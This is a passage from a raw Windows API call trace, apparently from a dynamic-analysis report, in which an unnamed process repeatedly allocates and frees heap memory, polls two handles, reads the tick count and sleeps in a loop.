HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65170 | out: hHeap=0x2150000) returned 1 [0189.076] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.078] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.079] GetTickCount () returned 0x2147a70 [0189.079] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64e70 [0189.079] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.079] GetTickCount () returned 0x2147a70 [0189.079] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79860 [0189.079] GetTickCount () returned 0x2147a70 [0189.079] GetTickCount () returned 0x2147a70 [0189.079] GetTickCount () returned 0x2147a70 [0189.079] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79860 | out: hHeap=0x2150000) returned 1 [0189.079] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.079] GetTickCount () returned 0x2147a70 [0189.079] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.080] GetTickCount () returned 0x2147a70 [0189.080] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.080] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64e70 | out: hHeap=0x2150000) returned 1 [0189.080] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.081] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.088] GetTickCount () returned 0x2148316 [0189.088] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e650b0 [0189.088] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.088] GetTickCount () returned 0x2148316 [0189.088] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e795c0 [0189.088] GetTickCount () returned 0x2148316 [0189.088] GetTickCount () returned 0x2148316 [0189.088] GetTickCount () returned 0x2148316 [0189.088] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e795c0 | out: hHeap=0x2150000) returned 1 [0189.088] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.088] GetTickCount () returned 0x2148316 [0189.088] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.088] GetTickCount () returned 0x2148316 [0189.088] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.088] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e650b0 | out: hHeap=0x2150000) returned 1 [0189.088] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.090] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.091] GetTickCount () returned 0x2148bac [0189.091] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64e70 [0189.091] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.091] GetTickCount () returned 0x2148bac [0189.091] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.091] GetTickCount () returned 0x2148bac [0189.091] GetTickCount () returned 0x2148bac [0189.091] GetTickCount () returned 0x2148bac [0189.091] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.091] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.091] GetTickCount () returned 0x2148bac [0189.091] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79650 [0189.091] GetTickCount () returned 0x2148bac [0189.092] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79650 | out: hHeap=0x2150000) returned 1 [0189.092] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64e70 | out: hHeap=0x2150000) returned 1 [0189.092] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.093] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.095] GetTickCount () returned 0x2149442 [0189.095] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64eb0 [0189.095] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.095] GetTickCount () returned 0x2149442 [0189.095] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.095] GetTickCount () returned 0x2149442 [0189.095] GetTickCount () returned 0x2149442 [0189.095] GetTickCount () returned 0x2149442 [0189.095] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.095] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.095] GetTickCount () returned 0x2149442 [0189.095] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79710 [0189.095] GetTickCount () returned 0x2149442 [0189.095] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79710 | out: hHeap=0x2150000) returned 1 [0189.095] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64eb0 | out: hHeap=0x2150000) returned 1 [0189.095] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.097] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.098] GetTickCount () returned 0x2149cd8 [0189.098] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e65030 [0189.098] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.098] GetTickCount () returned 0x2149cd8 [0189.098] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79860 [0189.098] GetTickCount () returned 0x2149cd8 [0189.098] GetTickCount () returned 0x2149cd8 [0189.098] GetTickCount () returned 0x2149cd8 [0189.098] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79860 | out: hHeap=0x2150000) returned 1 [0189.098] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.098] GetTickCount () returned 0x2149cd8 [0189.098] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.098] GetTickCount () returned 0x2149cd8 [0189.099] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.099] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65030 | out: hHeap=0x2150000) returned 1 [0189.100] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.102] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.103] GetTickCount () returned 0x214a57d [0189.103] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64db0 [0189.103] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.103] GetTickCount () returned 0x214a57d [0189.103] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.103] GetTickCount () returned 0x214a57d [0189.103] GetTickCount () returned 0x214a57d [0189.103] GetTickCount () returned 0x214a57d [0189.103] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.103] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.103] GetTickCount () returned 0x214a57d [0189.103] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.103] GetTickCount () returned 0x214a57d [0189.104] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.104] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64db0 | out: hHeap=0x2150000) returned 1 [0189.104] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.105] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.108] GetTickCount () returned 0x214ae13 [0189.108] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e65170 [0189.108] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.108] GetTickCount () returned 0x214ae13 [0189.109] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.109] GetTickCount () returned 0x214ae13 [0189.109] GetTickCount () returned 0x214ae13 [0189.109] GetTickCount () returned 0x214ae13 [0189.109] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.109] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.109] GetTickCount () returned 0x214ae13 [0189.109] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79890 [0189.109] GetTickCount () returned 0x214ae13 [0189.109] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79890 | out: hHeap=0x2150000) returned 1 [0189.109] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65170 | out: hHeap=0x2150000) returned 1 [0189.109] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.110] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.112] GetTickCount () returned 0x214b6a9 [0189.112] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64c70 [0189.112] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.112] GetTickCount () returned 0x214b6a9 [0189.112] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.112] GetTickCount () returned 0x214b6a9 [0189.112] GetTickCount () returned 0x214b6a9 [0189.112] GetTickCount () returned 0x214b6a9 [0189.112] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.112] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.112] GetTickCount () returned 0x214b6a9 [0189.112] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79650 [0189.112] GetTickCount () returned 0x214b6a9 [0189.112] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79650 | out: hHeap=0x2150000) returned 1 [0189.112] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64c70 | out: hHeap=0x2150000) returned 1 [0189.112] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.114] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.116] GetTickCount () returned 0x214bf3f [0189.116] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e65170 [0189.117] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.117] GetTickCount () returned 0x214bf4f [0189.117] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.117] GetTickCount () returned 0x214bf4f [0189.117] GetTickCount () returned 0x214bf4f [0189.117] GetTickCount () returned 0x214bf4f [0189.117] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.117] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.117] GetTickCount () returned 0x214bf4f [0189.117] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.117] GetTickCount () returned 0x214bf4f [0189.117] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.117] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65170 | out: hHeap=0x2150000) returned 1 [0189.117] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.119] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.120] GetTickCount () returned 0x214c7e5 [0189.120] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64cb0 [0189.120] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.120] GetTickCount () returned 0x214c7e5 [0189.120] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.120] GetTickCount () returned 0x214c7e5 [0189.120] GetTickCount () returned 0x214c7e5 [0189.120] GetTickCount () returned 0x214c7e5 [0189.120] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.120] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.120] GetTickCount () returned 0x214c7e5 [0189.120] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.120] GetTickCount () returned 0x214c7e5 [0189.121] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.121] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64cb0 | out: hHeap=0x2150000) returned 1 [0189.121] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.122] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.124] GetTickCount () returned 0x214d07b [0189.124] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64db0 [0189.124] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.124] GetTickCount () returned 0x214d07b [0189.124] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.124] GetTickCount () returned 0x214d07b [0189.124] GetTickCount () returned 0x214d07b [0189.124] GetTickCount () returned 0x214d07b [0189.124] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.124] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.124] GetTickCount () returned 0x214d07b [0189.124] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79860 [0189.124] GetTickCount () returned 0x214d07b [0189.124] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79860 | out: hHeap=0x2150000) returned 1 [0189.124] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64db0 | out: hHeap=0x2150000) returned 1 [0189.124] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.126] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.127] GetTickCount () returned 0x214d911 [0189.127] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e65230 [0189.127] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.127] GetTickCount () returned 0x214d911 [0189.127] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79650 [0189.127] GetTickCount () returned 0x214d911 [0189.127] GetTickCount () returned 0x214d911 [0189.127] GetTickCount () returned 0x214d911 [0189.127] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79650 | out: hHeap=0x2150000) returned 1 [0189.127] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.127] GetTickCount () returned 0x214d911 [0189.127] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79770 [0189.127] GetTickCount () returned 0x214d911 [0189.128] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79770 | out: hHeap=0x2150000) returned 1 [0189.128] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65230 | out: hHeap=0x2150000) returned 1 [0189.128] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.129] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.135] GetTickCount () returned 0x214e1b7 [0189.135] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64d30 [0189.135] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.135] GetTickCount () returned 0x214e1b7 [0189.135] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.135] GetTickCount () returned 0x214e1b7 [0189.135] GetTickCount () returned 0x214e1b7 [0189.135] GetTickCount () returned 0x214e1b7 [0189.135] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.135] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.135] GetTickCount () returned 0x214e1b7 [0189.135] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.135] GetTickCount () returned 0x214e1b7 [0189.135] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.135] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64d30 | out: hHeap=0x2150000) returned 1 [0189.135] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.137] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.138] GetTickCount () returned 0x214ea4d [0189.138] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64b30 [0189.138] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.138] GetTickCount () returned 0x214ea4d [0189.138] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.138] GetTickCount () returned 0x214ea4d [0189.138] GetTickCount () returned 0x214ea4d [0189.138] GetTickCount () returned 0x214ea4d [0189.138] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.138] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.138] GetTickCount () returned 0x214ea4d [0189.138] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.138] GetTickCount () returned 0x214ea4d [0189.138] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.139] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64b30 | out: hHeap=0x2150000) returned 1 [0189.139] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.140] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.142] GetTickCount () returned 0x214f2e3 [0189.142] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64c30 [0189.142] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.142] GetTickCount () returned 0x214f2e3 [0189.142] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.142] GetTickCount () returned 0x214f2e3 [0189.142] GetTickCount () returned 0x214f2e3 [0189.142] GetTickCount () returned 0x214f2e3 [0189.142] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.142] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.142] GetTickCount () returned 0x214f2e3 [0189.142] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.142] GetTickCount () returned 0x214f2e3 [0189.142] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.142] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64c30 | out: hHeap=0x2150000) returned 1 [0189.142] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.144] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.145] GetTickCount () returned 0x214fb79 [0189.145] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64c70 [0189.145] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.145] GetTickCount () returned 0x214fb79 [0189.145] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.145] GetTickCount () returned 0x214fb79 [0189.145] GetTickCount () returned 0x214fb79 [0189.145] GetTickCount () returned 0x214fb79 [0189.145] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.145] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.145] GetTickCount () returned 0x214fb79 [0189.146] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.146] GetTickCount () returned 0x214fb79 [0189.146] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.146] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64c70 | out: hHeap=0x2150000) returned 1 [0189.146] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.147] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.150] GetTickCount () returned 0x215041e [0189.150] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64b70 [0189.150] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.150] GetTickCount () returned 0x215041e [0189.150] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79650 [0189.151] GetTickCount () returned 0x215041e [0189.151] GetTickCount () returned 0x215041e [0189.151] GetTickCount () returned 0x215041e [0189.151] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79650 | out: hHeap=0x2150000) returned 1 [0189.151] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.151] GetTickCount () returned 0x215041e [0189.151] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79650 [0189.151] GetTickCount () returned 0x215041e [0189.151] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79650 | out: hHeap=0x2150000) returned 1 [0189.151] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64b70 | out: hHeap=0x2150000) returned 1 [0189.151] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.152] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.154] GetTickCount () returned 0x2150cb4 [0189.154] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64bb0 [0189.154] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.154] GetTickCount () returned 0x2150cb4 [0189.154] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.154] GetTickCount () returned 0x2150cb4 [0189.154] GetTickCount () returned 0x2150cb4 [0189.154] GetTickCount () returned 0x2150cb4 [0189.154] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.154] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.154] GetTickCount () returned 0x2150cb4 [0189.154] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.154] GetTickCount () returned 0x2150cb4 [0189.154] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.154] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64bb0 | out: hHeap=0x2150000) returned 1 [0189.154] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.157] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.159] GetTickCount () returned 0x215154a [0189.159] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64b70 [0189.159] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.159] GetTickCount () returned 0x215154a [0189.159] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e795c0 [0189.159] GetTickCount () returned 0x215154a [0189.159] GetTickCount () returned 0x215154a [0189.159] GetTickCount () returned 0x215154a [0189.159] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e795c0 | out: hHeap=0x2150000) returned 1 [0189.159] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.159] GetTickCount () returned 0x215154a [0189.159] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79710 [0189.159] GetTickCount () returned 0x215154a [0189.159] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79710 | out: hHeap=0x2150000) returned 1 [0189.159] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64b70 | out: hHeap=0x2150000) returned 1 [0189.159] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.161] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.162] GetTickCount () returned 0x2151de0 [0189.162] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64c30 [0189.162] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.162] GetTickCount () returned 0x2151de0 [0189.162] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.162] GetTickCount () returned 0x2151de0 [0189.162] GetTickCount () returned 0x2151de0 [0189.162] GetTickCount () returned 0x2151de0 [0189.162] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.162] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.162] GetTickCount () returned 0x2151de0 [0189.162] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.162] GetTickCount () returned 0x2151de0 [0189.163] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.163] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64c30 | out: hHeap=0x2150000) returned 1 [0189.163] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.164] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.167] GetTickCount () returned 0x2152686 [0189.167] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64db0 [0189.167] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.167] GetTickCount () returned 0x2152686 [0189.167] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.167] GetTickCount () returned 0x2152686 [0189.167] GetTickCount () returned 0x2152686 [0189.167] GetTickCount () returned 0x2152686 [0189.167] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.167] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.167] GetTickCount () returned 0x2152686 [0189.167] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.167] GetTickCount () returned 0x2152686 [0189.167] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.167] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64db0 | out: hHeap=0x2150000) returned 1 [0189.167] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.169] NtDelayExecution 